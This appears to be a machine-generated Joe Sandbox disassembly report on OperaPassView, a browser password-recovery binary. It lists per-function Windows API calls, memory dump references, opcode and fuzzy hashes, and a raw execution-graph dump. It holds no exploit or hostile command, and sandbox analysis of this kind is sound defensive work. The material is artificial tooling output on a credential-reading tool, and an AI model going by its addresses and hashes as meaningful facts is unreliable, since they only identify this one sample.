                                        • Instruction ID: 16c8af1d8422c26c0dc26ccbde34051a2b18808995f593d78c619f526c527117
                                        • Opcode Fuzzy Hash: adc9852e0b1febc2202ee91c46c3e0fdf9a531db0be14c9f292d03bd11a29de5
                                        • Instruction Fuzzy Hash: 0DF0F9B780122CBEFB05ABD49DC9DEB77ACDB04254F0001B6B719E2092D6749E44CBA9
                                        APIs
                                        • memset.MSVCRT ref: 004063D4
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0040C4E0,?,?,?,?,?,00401FB3), ref: 004063ED
                                        • strlen.MSVCRT ref: 004063FF
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00401FB3,?,?,00000008), ref: 00406410
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: aab097502b450ab04fa7522ad9fc48b90506c3085b37c64dbdaf70874a839c0e
                                        • Instruction ID: f9e3ec41d8263a0523f7ad29eccb5a434dbb2240c91e9d3185599c2a803b3e99
                                        • Opcode Fuzzy Hash: aab097502b450ab04fa7522ad9fc48b90506c3085b37c64dbdaf70874a839c0e
                                        • Instruction Fuzzy Hash: 8EF0F9B780122CBEEB059BD49DC9DEB77ACDB04254F0001B6B719E2092D6749E44CBA8
                                        APIs
                                          • Part of subcall function 00403E3B: memset.MSVCRT ref: 00403E5A
                                          • Part of subcall function 00403E3B: GetClassNameW.USER32(?,00000000,000000FF), ref: 00403E71
                                          • Part of subcall function 00403E3B: _wcsicmp.MSVCRT ref: 00403E83
                                        • SetBkMode.GDI32(?,00000001), ref: 0040A36A
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0040A378
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040A386
                                        • GetStockObject.GDI32(00000000), ref: 0040A38E
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 764393265-0
                                        • Opcode ID: 9b09ad20a0337de2b5b2026425044bdcc862375dc844c465ffe9bb5204cebf88
                                        • Instruction ID: 12fbb9296936337d5408b8751e97f1491dd38fe545a7ce3da3f523143f25607f
                                        • Opcode Fuzzy Hash: 9b09ad20a0337de2b5b2026425044bdcc862375dc844c465ffe9bb5204cebf88
                                        • Instruction Fuzzy Hash: B8F04F3110021AFFCF112FA5DD0AA9E3F25AF04725F10823AF919B55F1CB799960EA49
                                        APIs
                                        • memcpy.MSVCRT(00410598,?,00000050,?,004013CF,?), ref: 00409B14
                                        • memcpy.MSVCRT(004102C8,?,000002CC,00410598,?,00000050,?,004013CF,?), ref: 00409B26
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409B39
                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00009810,00000000), ref: 00409B4D
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: 0ad54631e455bc40c9bc3f9a8f680d40ba5a2de016384f6f8a677ee17f95a5d3
                                        • Instruction ID: c0de872c080c53e53b11d38064c8daf66136313e004b0b3f38d9abbee202b5ff
                                        • Opcode Fuzzy Hash: 0ad54631e455bc40c9bc3f9a8f680d40ba5a2de016384f6f8a677ee17f95a5d3
                                        • Instruction Fuzzy Hash: DFF08276690720FBD7616BA4AC0AB967A50E745B15F10C57AF301B61E1C3F508919FCC
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 65f5870ce9b62acd6e5566cf8349cdebd7e237696bb969b904447126deb3198b
                                        • Instruction ID: e62393db456745206b1eac394a25b361b16cb1bc4ee48270208fb90aee829c93
                                        • Opcode Fuzzy Hash: 65f5870ce9b62acd6e5566cf8349cdebd7e237696bb969b904447126deb3198b
                                        • Instruction Fuzzy Hash: 66E01A607003012ADA10AB7EB980B42239CDA84740318C83FB608E76E2EB3CC84099BC
                                        APIs
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040848C
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: f5@$@
                                        • API String ID: 3850602802-1863846301
                                        • Opcode ID: 5fd78c676e631c3709107cb9d65915e65d3b6653e538a2b2a1514ac77431e71f
                                        • Instruction ID: 70b6a3239b96f3e75da7ea75169189ebfa639c78ed79f00fa946d4b3eb5f7a99
                                        • Opcode Fuzzy Hash: 5fd78c676e631c3709107cb9d65915e65d3b6653e538a2b2a1514ac77431e71f
                                        • Instruction Fuzzy Hash: 7B518330A00205AADF60BB218945F9A73A5AB10324F10C53FF4997F2E1DEBC59C18F4D
                                        APIs
                                        • wcschr.MSVCRT ref: 00406449
                                        • wcschr.MSVCRT ref: 00406457
                                          • Part of subcall function 004063AF: memset.MSVCRT ref: 004063D4
                                          • Part of subcall function 004063AF: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0040C4E0,?,?,?,?,?,00401FB3), ref: 004063ED
                                          • Part of subcall function 004063AF: strlen.MSVCRT ref: 004063FF
                                          • Part of subcall function 004063AF: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00401FB3,?,?,00000008), ref: 00406410
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcschr$ByteCharFileMultiWideWritememsetstrlen
                                        • String ID: "
                                        • API String ID: 3380400052-123907689
                                        • Opcode ID: 42c06210ac77bc4897aff97fd64da6e708580b768c0c9cafe00fed859f45ae67
                                        • Instruction ID: 2b2664d594544958fba6627fb4497dfc09889f1935fb328af1c9ed3c8cb62cbb
                                        • Opcode Fuzzy Hash: 42c06210ac77bc4897aff97fd64da6e708580b768c0c9cafe00fed859f45ae67
                                        • Instruction Fuzzy Hash: BB316D71904218AFDF14AFA5CC419EEB7B8EF44324F21812BE811B71D1DB789A529A9C
                                        APIs
                                        • qsort.MSVCRT ref: 004079B4
                                          • Part of subcall function 004047CA: _wcsicmp.MSVCRT ref: 004047E0
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 1579243037-1578091866
                                        • Opcode ID: 28e8b9eeae73f08da568e07234b3670defb4d434af77f155d27e67a09f67c443
                                        • Instruction ID: c613dfa10845265b9001ee98788bfcdc0d385a2ee53f21912ea71c72832a41b0
                                        • Opcode Fuzzy Hash: 28e8b9eeae73f08da568e07234b3670defb4d434af77f155d27e67a09f67c443
                                        • Instruction Fuzzy Hash: 4921F2B1B04501AFD714AF36C880E56B3AAFFA5314B11017EE615BB2D1CB79B811CB9A
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00404301
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404311
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: 6a23412141f1501ece79e54fe078a7de92c685d9ae7c75e59bd685d64d1c1fe3
                                        • Instruction ID: 773ebf4e3c3b42aeb52fcb9d4681768b59ff38d30494755ab7908b074b5742af
                                        • Opcode Fuzzy Hash: 6a23412141f1501ece79e54fe078a7de92c685d9ae7c75e59bd685d64d1c1fe3
                                        • Instruction Fuzzy Hash: E5118671A00208BFDB10DFE8C8819DF73B4FB44314F104476EE14E7181D6789A058BD9
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00406674
                                        • _snwprintf.MSVCRT ref: 00406694
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintf$FileWritewcslen
                                        • String ID: %%-%d.%ds
                                        • API String ID: 889019245-2008345750
                                        • Opcode ID: 9b360df86315a4d0fc8687c9d094769c5241e7bd0f342b486d010c923cc8926d
                                        • Instruction ID: 279801148e76b0a9075c42a2eba3bd7f9e0035b97abbdc6c8671880a9300571e
                                        • Opcode Fuzzy Hash: 9b360df86315a4d0fc8687c9d094769c5241e7bd0f342b486d010c923cc8926d
                                        • Instruction Fuzzy Hash: 8C019271100204AFC710AF59CC82D5AB7ADFB48318B11483EF946AB192D676F8519B68
                                        APIs
                                        • memset.MSVCRT ref: 0040568B
                                        • SendMessageW.USER32((8@,0000105F,00000000,?), ref: 004056B9
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: (8@
                                        • API String ID: 568519121-2824614689
                                        • Opcode ID: b9b052f7272240faca1b1630d4f7d6d0b9aad55754f91eff3e97a74e79ecb4b9
                                        • Instruction ID: 6449b0a7daa4ed240facb274c3a900b9879f3f9cf80db6cf5f8cf744cfdf067d
                                        • Opcode Fuzzy Hash: b9b052f7272240faca1b1630d4f7d6d0b9aad55754f91eff3e97a74e79ecb4b9
                                        • Instruction Fuzzy Hash: 5E01A275800609AFDB208F45C885AAFB7B8FF81745F50482AE844BB281D3359945CB79
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: TextWindowmemset
                                        • String ID: caption
                                        • API String ID: 2590972913-4135340389
                                        • Opcode ID: bd9d412dde3222f547a0bd8750d1c8608e205217c0b73fdaf50cdbc3768e5135
                                        • Instruction ID: 2db4a85a8052f98b084067700c6c2493da5e0403811a3532aa4b5108901f4221
                                        • Opcode Fuzzy Hash: bd9d412dde3222f547a0bd8750d1c8608e205217c0b73fdaf50cdbc3768e5135
                                        • Instruction Fuzzy Hash: 8BF0A9B2D40314AAEB206B55DC4ABCA366CEB44754F0000B6BB04B61D2D7B8AD80CBDC
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: f64d20f70bd67578458b35ede7a69f7856e7be3fe24160ed828cbcd4216c948e
                                        • Instruction ID: 813b7da2fed051c357424ccd667ed75c52a95f27b445824e5a4df21e48fe23d2
                                        • Opcode Fuzzy Hash: f64d20f70bd67578458b35ede7a69f7856e7be3fe24160ed828cbcd4216c948e
                                        • Instruction Fuzzy Hash: 9AF06271600204EFEB04EF95C889F6A33A8EF04700F144079E909EB1D1E7B8AA00CB69
                                        APIs
                                          • Part of subcall function 00403CE2: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040556D,00000000,00405420,?,00000000,00000208), ref: 00403CED
                                        • wcsrchr.MSVCRT ref: 00405570
                                        • wcscat.MSVCRT ref: 00405586
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileModuleNamewcscatwcsrchr
                                        • String ID: _lng.ini
                                        • API String ID: 383090722-1948609170
                                        • Opcode ID: 70b132c861c53a5e80b6cd8212b27e2896445419851ca4d991723d1737cddbc7
                                        • Instruction ID: 96025fcac0a5ccfddca65140341af9a58aeb290220dbc56d4301e319b9ea4a6a
                                        • Opcode Fuzzy Hash: 70b132c861c53a5e80b6cd8212b27e2896445419851ca4d991723d1737cddbc7
                                        • Instruction Fuzzy Hash: 1FC01262A46B2028E21232225E03B4A124CDF42714F60083BFC00750C6FFBEA65940AE
                                        APIs
                                          • Part of subcall function 004040CA: memset.MSVCRT ref: 004040D8
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 00405715
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 0040573C
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 0040575D
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 0040577E
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: df11e75221f36aa136dd2a530cfc53c12a22ff0e5e946e70cf3a3ed6d6825f66
                                        • Instruction ID: af581bbccb9086d889a36cfff49bdd0ea8f57c867f74f292b53e8b0c34c2ba8d
                                        • Opcode Fuzzy Hash: df11e75221f36aa136dd2a530cfc53c12a22ff0e5e946e70cf3a3ed6d6825f66
                                        • Instruction Fuzzy Hash: C8218EB4A11701CED7159F2A9444916FBE8FFD0310B2A89AFD118DB2B2D7B8C8409F69
                                        APIs
                                        • wcslen.MSVCRT ref: 004044B8
                                        • free.MSVCRT ref: 004044DB
                                          • Part of subcall function 00403C2B: malloc.MSVCRT ref: 00403C47
                                          • Part of subcall function 00403C2B: memcpy.MSVCRT(00000000,00000000,?,00000000,?,00402298,00000002,?,?,?,00401B5C,?), ref: 00403C5F
                                          • Part of subcall function 00403C2B: free.MSVCRT ref: 00403C68
                                        • free.MSVCRT ref: 004044FE
                                        • memcpy.MSVCRT(?,?,?), ref: 00404522
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: d4fc3262eca6a9203210309d0fdc2fcf5fe16143f3354878ebb1b6485f4fe0d1
                                        • Instruction ID: 6e423bbbc95361190f821a2eaa1269f95e241a9315f3886d9563661ffd26abd2
                                        • Opcode Fuzzy Hash: d4fc3262eca6a9203210309d0fdc2fcf5fe16143f3354878ebb1b6485f4fe0d1
                                        • Instruction Fuzzy Hash: A721A1B5100704EFC730DF28D881CAAB7F8EF843247108A2EF552A7691D735BD058B58

                                        Execution Graph

                                        Execution Coverage:12.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:1.2%
                                        Total number of Nodes:1805
                                        Total number of Limit Nodes:24
                                        execution_graph 5489 40b7c0 5492 40b458 5489->5492 5495 40b432 5492->5495 5494 40b461 5496 40b441 __dllonexit 5495->5496 5497 40b43b _onexit 5495->5497 5496->5494 5497->5496 4726 40b441 __dllonexit 5498 4014c6 5499 409e0d 4 API calls 5498->5499 5500 4014d4 5499->5500 4727 406a47 4728 406ac3 4727->4728 4729 406a5c 4727->4729 4729->4728 4730 406a6a memset 4729->4730 4731 406a8d 4730->4731 4731->4728 4732 406a91 _snwprintf SendMessageW 4731->4732 4732->4728 5501 4021c9 5502 4022d1 5501->5502 5507 4021dc 5501->5507 5514 407331 5502->5514 5504 404eeb 7 API calls 5504->5507 5505 40215a memset WideCharToMultiByte strlen WriteFile 5505->5507 5506 404eab free 5506->5507 5507->5504 5507->5505 5507->5506 5508 4022bd 5507->5508 5511 40215a 5508->5511 5510 4022ca 5512 40b780 5511->5512 5513 402167 memset WideCharToMultiByte strlen WriteFile 5512->5513 5513->5510 5515 407352 5514->5515 5516 407345 5514->5516 5517 407366 5515->5517 5518 407357 5515->5518 5519 406d7d 2 API calls 5516->5519 5521 407378 5517->5521 5522 40736b 5517->5522 5520 406c4e 14 API calls 5518->5520 5531 407350 5519->5531 5520->5531 5524 40738c 5521->5524 5525 40737d 5521->5525 5535 406ea0 5522->5535 5527 4073a0 5524->5527 5528 407391 5524->5528 5543 406f1c 5525->5543 5529 4073b2 5527->5529 5530 4073a5 5527->5530 5555 407044 memset memset memset memset 5528->5555 5529->5531 5591 407282 5529->5591 5577 406ddd 5530->5577 5531->5510 5536 406f07 5535->5536 5537 406eae 5535->5537 5603 404248 wcslen WriteFile 5536->5603 5537->5536 5538 406eaf _snwprintf 5537->5538 5541 406ee1 _snwprintf 5538->5541 5540 406f15 5540->5531 5602 404248 wcslen WriteFile 5541->5602 5604 404248 wcslen WriteFile 5543->5604 5545 40702f 5628 404248 wcslen WriteFile 5545->5628 5547 40703c 5547->5531 5550 406fe5 wcscat 5551 406f53 5550->5551 5551->5545 5551->5550 5605 40aeb5 _snwprintf 5551->5605 5606 40aee6 5551->5606 5612 40af85 memset memset 5551->5612 5556 4070ca 5555->5556 5557 4070fc 5556->5557 5630 
40aeb5 _snwprintf 5556->5630 5631 404248 wcslen WriteFile 5557->5631 5560 4070e5 _snwprintf 5560->5557 5561 40725f 5635 404248 wcslen WriteFile 5561->5635 5563 40726c 5636 404248 wcslen WriteFile 5563->5636 5564 407133 wcscpy 5573 407109 5564->5573 5566 407279 5566->5531 5568 40aee6 3 API calls 5568->5573 5569 4071d6 wcscpy 5569->5573 5571 4071bc _snwprintf 5571->5573 5572 4071f8 wcscat 5572->5573 5573->5561 5573->5564 5573->5568 5573->5569 5573->5572 5574 40af85 13 API calls 5573->5574 5632 40aeb5 _snwprintf 5573->5632 5633 40aeb5 _snwprintf 5573->5633 5575 407213 _snwprintf 5574->5575 5634 404248 wcslen WriteFile 5575->5634 5637 404248 wcslen WriteFile 5577->5637 5579 406e19 5638 404248 wcslen WriteFile 5579->5638 5581 406e27 5582 406e71 5581->5582 5585 406e40 _snwprintf 5581->5585 5640 404248 wcslen WriteFile 5582->5640 5584 406e85 5641 404248 wcslen WriteFile 5584->5641 5639 404248 wcslen WriteFile 5585->5639 5588 406e8e 5642 404248 wcslen WriteFile 5588->5642 5590 406e97 5590->5531 5643 404248 wcslen WriteFile 5591->5643 5593 407299 5594 4072a3 memset 5593->5594 5597 40aee6 3 API calls 5593->5597 5598 406b6d 2 API calls 5593->5598 5601 40731c 5593->5601 5594->5593 5596 40732a 5596->5531 5597->5593 5599 4072ef _snwprintf 5598->5599 5644 404248 wcslen WriteFile 5599->5644 5645 404248 wcslen WriteFile 5601->5645 5602->5537 5603->5540 5604->5551 5605->5551 5611 40aef0 5606->5611 5607 40af62 memcpy 5607->5611 5608 40af15 memcpy 5608->5611 5609 40af81 5609->5551 5610 40af48 memcpy 5610->5611 5611->5607 5611->5608 5611->5609 5611->5610 5613 40afd1 5612->5613 5614 40afe8 wcscpy 5613->5614 5615 40b06c 5613->5615 5616 40b023 5614->5616 5617 40affc _snwprintf wcscat 5614->5617 5618 40b071 wcscat 5615->5618 5619 40b07e wcscat 5615->5619 5620 40b05f wcscat 5616->5620 5629 40aeb5 _snwprintf 5616->5629 5617->5616 5618->5619 5621 40b09b 5619->5621 5622 40b08e wcscat 5619->5622 5620->5615 5624 40b0a0 wcscat 5621->5624 5625 407000 _snwprintf 5621->5625 5622->5621 5624->5625 
